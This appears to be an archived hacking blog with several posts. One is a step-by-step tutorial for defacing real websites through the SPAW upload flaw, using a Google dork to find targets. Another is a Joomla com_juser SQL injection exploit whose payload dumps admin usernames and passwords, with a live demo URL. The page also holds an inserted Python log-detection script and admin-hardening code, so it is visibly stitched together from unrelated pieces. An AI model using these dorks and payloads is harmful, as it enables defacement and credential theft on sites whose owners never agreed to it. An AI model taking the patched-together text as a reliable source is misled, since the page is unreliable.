
Wednesday, 10 July 2013

Learning hacking from the beginning :)

(Beginner) Complete Tutorial + Pictures: Deface via SPAW Upload Vulnerability

Apologies in advance to the admins and moderators if this is a repost
of the tutorial at http://hacker-newbie.org/showthread.php?...light=spaw
If it really is not useful, feel free to delete it.

In my opinion this thread is very useful for real beginners like me, since a few days ago someone posted http://hacker-newbie.org/showthread.php?tid=12893 asking where to start with defacing. It is explained here with PICTURES; hopefully it is useful for real beginners like me.

OK, let's go through it.

First: search for the dork on Google: inurl:"spaw2/dialogs/" or inurl:"spaw2/uploads/files/"
See the picture


[Image: 30j334i.jpg]

After you have searched for that dork on Google,
pick one of the sites you want to deface; remember, not every site will work :P

See the picture

[Image: 9u4wup.jpg]

Once you are on the site,
look at its URL in the address bar.
Example URL: http://contoh.com/spaw2/uploads/files/
The /spaw2/uploads/files/ part

is replaced with spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

so that it becomes http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

SEE THE PICTURE

[Image: 2z4a0s3.jpg]
[Image: zv3bjo.jpg]

Press Enter
A screen like this one will open
SEE THE TUTORIAL IN THE PICTURE


[Image: 14jqof7.jpg]

Next
keep following the pictures; the tutorial is inside the picture

[Image: 2m6of8l.jpg]

NEXT
[Image: 2076hw4.jpg]

Next: THE TUTORIAL IS IN THE PICTURE

[Image: 2884dbc.jpg]

NEXT

[Image: 34y4ahe.jpg]

DONE
Hopefully this is understandable

IF THE PICTURES ARE NOT CLEAR, JUST REFRESH OR OPEN THEM ONE BY ONE

Source: Hn..

Saturday, 29 June 2013

Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection



Joomla Component com_juser (id) SQL injection Vulnerability
==================================================================================




###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)

###################################################



Example:
http://localHost/path/
index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
-----
DEMO LIVE:

http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++


<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>

# milw0rm.com [2009-06-01]
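
A defender-side check for the two request patterns this page shows: the SPAW file-manager dialog URL from the first post, and the com_juser show_profile request above whose id carries SQL after the number. This is an added example, not code from the original posts; the log lines, IP addresses and function names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP, request target and status from a combined-log-format line.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
INT_RE = re.compile(r"[0-9]+")

def has(query, key, value):
    """True if query parameter `key` carries `value` (case-insensitive)."""
    return value in (v.lower() for v in query.get(key, []))

def classify(target):
    """Return a finding label for one request target, or None."""
    parts = urlsplit(target)
    # keep_blank_values: an empty "id=" must be seen, not silently dropped
    query = parse_qs(parts.query, keep_blank_values=True)
    # Pattern 1: direct request for the SPAW2 file-manager dialog.
    if parts.path.lower().endswith("/spaw2/dialogs/dialog.php") and has(query, "module", "spawfm"):
        return "spaw-filemanager-dialog"
    # Pattern 2: com_juser show_profile whose id is not a plain integer.
    if has(query, "option", "com_juser") and has(query, "task", "show_profile"):
        if any(not INT_RE.fullmatch(v) for v in query.get("id", [])):
            return "com_juser-nonnumeric-id"
    return None

def scan(lines):
    """Return (client_ip, status, label) for every flagged log line."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and (label := classify(m.group(2))):
            findings.append((m.group(1), int(m.group(3)), label))
    return findings

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jul/2013:10:00:01 +0700] "GET /spaw2/dialogs/dialog.php'
    '?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&type=files HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jul/2013:10:00:05 +0700] "GET /index.php'
    '?option=com_juser&task=show_profile&id=70 HTTP/1.1" 200 2048',
    '203.0.113.44 - - [10/Jul/2013:10:00:09 +0700] "GET /index.php'
    '?option=com_juser&task=show_profile&id=70+and+1=2 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [10/Jul/2013:10:00:12 +0700] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The status code is kept in each finding so that flagged requests the server answered with 200 can be reviewed first.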

Sunday, 23 June 2013


Just a reminder:
don't get so absorbed in defacing other people's sites that the security of your own site is neglected.
There may be no SQL injection or similar bug on our own site,
but what if another site on the same hosting as ours is attacked and the attacker does server jumping?
Then our site is dead :-D They can see our MySQL login credentials :-D
Here are a few ways to protect the admin login:
1. Use the web-protect management feature in cPanel: select the admin login directory, then set its user and password.
2. Use a dedicated IP, meaning only our own IP can get into the admin directory.
This is done with .htaccess:


# Apache 2.2 access-control syntax (on Apache 2.4 these directives need mod_access_compat)
AuthUserFile /dev/null
AuthGroupFile /dev/null

AuthName "Access Control"
AuthType Basic

order deny,allow
deny from all

#IP address to Whitelist
allow from xxx.xxx.xxx.xxx

where xxx.xxx.xxx.xxx is our own IP / the one we usually use
3. Create a file named protect.php (or whatever name you like):

<?php
// protect.php: session-based login gate. Include it at the top of each admin page.
session_start();

// You can change the username and password by changing the two strings below.
$admin_user_name = "nama";
$admin_password = "password";

// Request-derived values are HTML-escaped before they are printed.
$host = htmlspecialchars(isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '', ENT_QUOTES, 'UTF-8');
$self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');

// Clear the login state, show the error page and stop.
function login_error($host, $php_self) {
    unset($_SESSION['user']);
    echo "<HTML><HEAD>
<TITLE>$host : Administration</TITLE>
</HEAD><BODY bgcolor=#ffffff>
<table border=0 cellspacing=0 cellpadding=0 width=100%>
<TR><TD align=left>
<font face=verdana size=2><B> You Need to log on to access this part of the site! </b> </font></td>
</tr></table>
<P></P>
<font face=verdana size=2>
<center>";
    echo "Error: You are not authorized to access this part of the site!
<B><a href=\"$php_self\">Click here</a></b> to login again.<P>
</center>
</font>
</BODY>
</HTML>";
    exit;
}

if (!isset($_SESSION['user'])) {
    // Only accept plain string fields from the login form.
    $u_name = (isset($_POST['u_name']) && is_string($_POST['u_name'])) ? $_POST['u_name'] : null;
    $u_password = (isset($_POST['u_password']) && is_string($_POST['u_password'])) ? $_POST['u_password'] : '';

    if ($u_name === null) {
        // No credentials submitted yet: show the login form and stop.
        $form_to = $self;
        if (!empty($_SERVER['QUERY_STRING']))
            $form_to .= "?" . htmlspecialchars($_SERVER['QUERY_STRING'], ENT_QUOTES, 'UTF-8');
?>
<HTML>
<HEAD>
<TITLE><?php echo $host; ?> : Authentication Required</TITLE>
</HEAD>
<BODY bgcolor=#ffffff>
<table border=0 cellspacing=0 cellpadding=0 width=100%>
<TR><TD>
<font face=verdana size=2><B>(Access Restricted to Authorized Personnel)</b> </font></td>
</tr></table>
<P></P>
<font face=verdana size=2>
<center>
<form method=post action="<?php echo $form_to; ?>">
<table border=0 width=350>
<TR>
<TD><font face=verdana size=2><B>User Name</B></font></TD>
<TD><font face=verdana size=2><input type=text name=u_name size=20></font></TD></TR>
<TR>
<TD><font face=verdana size=2><B>Password</B></font></TD>
<TD><font face=verdana size=2><input type=password name=u_password size=20></font></TD>
</TR>
</table>
<input type=submit value=Login></form>
</center>
</font>
</BODY>
</HTML>
<?php
        exit;
    }

    if (strlen($u_name) < 2)
        login_error($host, $self);

    // hash_equals() compares in constant time; both the name and the password must match.
    if (hash_equals($admin_user_name, $u_name) && hash_equals($admin_password, $u_password)) {
        session_regenerate_id(true); // issue a new session id after login
        $_SESSION['user'] = $u_name;
    } else { // username or password incorrect
        login_error($host, $self);
    }

    // Reload the requested page now that the session is authenticated.
    $page_location = $_SERVER['PHP_SELF'];
    if (!empty($_SERVER['QUERY_STRING']))
        $page_location .= "?" . $_SERVER['QUERY_STRING'];
    header("Location: " . $page_location);
    exit;
}
?>

4. Then just add it to index.php in the admin directory,
like this: include 'protect.php';

5. Then encrypt protect.php so that it cannot be read :-D

If you use all of them, your site has 3 layers of security :-D
* 1: IP protection; if that is bypassed there are still 2 more :-D
* 2: page password protection (the cPanel one); if that is bypassed too there is still 1 more :-D
* 3: the password-protected page; if even that is bypassed, all that is left is the admin login menu itself, hehe
but most likely it is impossible to get through all of them

Source: http://forum.indonesiansecuritydown.org/thread-1.html